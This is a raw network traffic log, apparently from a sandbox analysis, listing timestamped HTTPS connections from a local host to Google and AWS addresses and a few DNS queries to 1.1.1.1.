                                                                          Aug 29, 2024 17:12:23.463484049 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.463489056 CEST53779443192.168.2.5142.250.186.161
                                                                          Aug 29, 2024 17:12:23.464096069 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.467586040 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.467648983 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.467653990 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.471807957 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.471854925 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.471854925 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.471867085 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.471910954 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.475888014 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.480077982 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.480104923 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.480127096 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.480135918 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.480178118 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.483393908 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.486865044 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.486936092 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.486943960 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.491136074 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.491167068 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.491189957 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.491203070 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.491261959 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.492893934 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.492957115 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.493001938 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.493009090 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.495990992 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.496027946 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.496035099 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.497899055 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.497941017 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.497946978 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.500067949 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.500130892 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.500138044 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.506716013 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.506747007 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.506767988 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.506776094 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.506813049 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.506819010 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.507580996 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.507628918 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.507636070 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.509706020 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.509777069 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.509783983 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.512337923 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.512382984 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.512389898 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.514655113 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.514698029 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.514703989 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.518274069 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.518321037 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.518332958 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.519052029 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.519125938 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.519134045 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.522095919 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.522138119 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.522144079 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.523643017 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.523699045 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.523705959 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.526040077 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.526138067 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.526144981 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.529441118 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.529534101 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.529588938 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.530088902 CEST53777443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.530103922 CEST44353777142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.554399967 CEST53785443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:23.554439068 CEST4435378554.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:23.554491043 CEST53785443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:23.555351973 CEST53785443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:23.555366039 CEST4435378554.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:23.903438091 CEST44353780142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:23.903503895 CEST44353780142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:23.903517008 CEST44353779142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:23.903562069 CEST53780443192.168.2.5142.250.186.161
                                                                          Aug 29, 2024 17:12:23.903585911 CEST44353779142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:23.903635025 CEST53779443192.168.2.5142.250.186.161
                                                                          Aug 29, 2024 17:12:23.973264933 CEST53786443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.973297119 CEST44353786142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.973361969 CEST53786443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.974618912 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.974656105 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.974716902 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.975404024 CEST53786443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.975416899 CEST44353786142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:23.976047039 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:23.976062059 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:24.075546980 CEST53788443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:12:24.075575113 CEST44353788216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:12:24.075639963 CEST53788443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:12:24.075953960 CEST53788443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:12:24.075970888 CEST44353788216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:12:24.096224070 CEST53779443192.168.2.5142.250.186.161
                                                                          Aug 29, 2024 17:12:24.096249104 CEST44353779142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:24.104000092 CEST53780443192.168.2.5142.250.186.161
                                                                          Aug 29, 2024 17:12:24.104022980 CEST44353780142.250.186.161192.168.2.5
                                                                          Aug 29, 2024 17:12:24.143690109 CEST53789443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:24.143721104 CEST44353789142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:24.143778086 CEST53789443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:24.144124985 CEST53789443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:24.144134998 CEST44353789142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:24.403923035 CEST4435378554.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:24.463486910 CEST53785443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:24.620075941 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:24.622061014 CEST44353786142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:24.666512966 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:24.708791971 CEST44353788216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:12:24.761998892 CEST53786443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.428422928 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.428471088 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.428488016 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.430788040 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.430830002 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.430840015 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.433485031 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.433526993 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.433537006 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.435503006 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.435549021 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.435559034 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.437714100 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.437768936 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.437779903 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.439980030 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.440026045 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.440033913 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.442348957 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.442400932 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.442411900 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.445405960 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.445455074 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.445463896 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.447093964 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.447130919 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.447140932 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.449263096 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.449306011 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.449318886 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.451559067 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.451611996 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.451622009 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.453629971 CEST53747443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:25.453895092 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.453936100 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.453943968 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.454926014 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.455657005 CEST53788443192.168.2.5216.58.206.68
                                                                          Aug 29, 2024 17:12:25.455667019 CEST44353788216.58.206.68192.168.2.5
                                                                          Aug 29, 2024 17:12:25.456381083 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.456433058 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.456440926 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.458547115 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.458594084 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.458606958 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.458756924 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.458795071 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.460222960 CEST53787443192.168.2.5142.250.184.238
                                                                          Aug 29, 2024 17:12:25.460241079 CEST44353787142.250.184.238192.168.2.5
                                                                          Aug 29, 2024 17:12:25.500509024 CEST44353747172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:25.575006008 CEST4435379054.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:25.575239897 CEST53790443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:25.575263977 CEST4435379054.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:25.575658083 CEST4435379054.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:25.576157093 CEST53790443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:25.576216936 CEST4435379054.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:25.576447010 CEST53790443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:25.576494932 CEST53790443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:25.576499939 CEST4435379054.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:25.650264025 CEST44353747172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:25.650966883 CEST44353747172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:25.651027918 CEST53747443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:25.656403065 CEST53747443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:25.656425953 CEST44353747172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:25.687521935 CEST4435379054.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:25.687594891 CEST4435379054.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:25.687639952 CEST53790443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:25.687982082 CEST53790443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:25.687994957 CEST4435379054.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:25.691998959 CEST53792443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:25.692018032 CEST4435379254.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:25.692078114 CEST53792443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:25.692384958 CEST53792443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:25.692395926 CEST4435379254.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:25.864564896 CEST53793443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:25.864592075 CEST44353793172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:25.864651918 CEST53793443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:25.864944935 CEST53793443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:25.864959955 CEST44353793172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:26.028034925 CEST53795443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.028037071 CEST53794443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.028070927 CEST44353795142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.028073072 CEST44353794142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.028140068 CEST53795443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.028140068 CEST53794443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.028378010 CEST53795443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.028389931 CEST44353795142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.028693914 CEST53794443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.028706074 CEST44353794142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.039108992 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:26.039135933 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:26.039227009 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:26.039526939 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:26.039541960 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:26.042992115 CEST53797443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.043009043 CEST4435379754.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.043116093 CEST53797443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.044569016 CEST53797443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.044583082 CEST4435379754.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.185389042 CEST4435379254.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.188602924 CEST53792443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.188613892 CEST4435379254.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.188909054 CEST4435379254.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.189851999 CEST53792443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.189902067 CEST4435379254.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.190123081 CEST53792443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.190124035 CEST53792443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.190145016 CEST4435379254.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.305183887 CEST4435379254.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.305816889 CEST4435379254.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.305845976 CEST53792443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.305855036 CEST4435379254.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.305879116 CEST53792443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.305915117 CEST53792443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.516211033 CEST44353793172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:26.517101049 CEST53793443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:26.517124891 CEST44353793172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:26.517512083 CEST44353793172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:26.518712044 CEST53793443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:26.518712044 CEST53793443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:26.518728018 CEST44353793172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:26.518784046 CEST44353793172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:26.544435978 CEST4435379754.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.545978069 CEST53797443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.545988083 CEST4435379754.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.546346903 CEST4435379754.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.547580957 CEST53797443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.547646046 CEST4435379754.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.548021078 CEST53797443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.559703112 CEST53793443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:26.588496923 CEST4435379754.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.666482925 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:26.667180061 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:26.667191029 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:26.667527914 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:26.668217897 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:26.668283939 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:26.668674946 CEST4435379754.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.668822050 CEST4435379754.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.669167995 CEST53797443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.670380116 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:26.671391010 CEST53797443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.671399117 CEST4435379754.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.677079916 CEST53798443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.677092075 CEST4435379854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.677211046 CEST53798443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.677429914 CEST53798443192.168.2.554.174.215.77
                                                                          Aug 29, 2024 17:12:26.677440882 CEST4435379854.174.215.77192.168.2.5
                                                                          Aug 29, 2024 17:12:26.712491035 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:26.746192932 CEST44353794142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.746452093 CEST53794443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.746469975 CEST44353794142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.746958017 CEST44353794142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.746969938 CEST44353794142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.747073889 CEST53794443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.747081041 CEST44353794142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.747477055 CEST53794443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.748147011 CEST44353794142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.748356104 CEST53794443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.748431921 CEST44353794142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.748495102 CEST53794443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.748500109 CEST44353794142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.755110025 CEST44353795142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.755342007 CEST53795443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.755358934 CEST44353795142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.755682945 CEST44353795142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.755693913 CEST44353795142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.756015062 CEST53795443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.756023884 CEST44353795142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.756129026 CEST53795443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.756289005 CEST44353795142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.756561041 CEST53795443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.756561041 CEST53795443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.756580114 CEST44353795142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.756618977 CEST44353795142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.808758974 CEST44353793172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:26.808832884 CEST44353793172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:26.808903933 CEST53793443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:26.811697006 CEST53793443192.168.2.5172.217.16.206
                                                                          Aug 29, 2024 17:12:26.811707020 CEST44353793172.217.16.206192.168.2.5
                                                                          Aug 29, 2024 17:12:26.960503101 CEST44353794142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:26.960849047 CEST53794443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.963814974 CEST53795443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:26.963835001 CEST44353795142.250.184.193192.168.2.5
                                                                          Aug 29, 2024 17:12:27.151887894 CEST53795443192.168.2.5142.250.184.193
                                                                          Aug 29, 2024 17:12:27.282733917 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.282782078 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.282826900 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.282855988 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:27.282864094 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.282876015 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:12:27.282908916 CEST53796443192.168.2.5142.250.186.68
                                                                          Aug 29, 2024 17:12:27.282954931 CEST44353796142.250.186.68192.168.2.5
                                                                          Aug 29, 2024 17:13:34.918714046 CEST4970780192.168.2.515.197.204.56
                                                                          Aug 29, 2024 17:13:34.923470974 CEST804970715.197.204.56192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 29, 2024 17:12:10.960086107 CEST | 54932 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:10.992037058 CEST | 53 | 54932 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:13.865864992 CEST | 53 | 58230 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:14.046870947 CEST | 63912 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:14.047013998 CEST | 54528 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 17:12:14.054627895 CEST | 53 | 65435 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:14.059910059 CEST | 53 | 54528 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:14.230212927 CEST | 53 | 63912 | 1.1.1.1 | 192.168.2.5
Aug 29, 2024 17:12:14.931062937 CEST | 56681 | 53 | 192.168.2.5 | 1.1.1.1
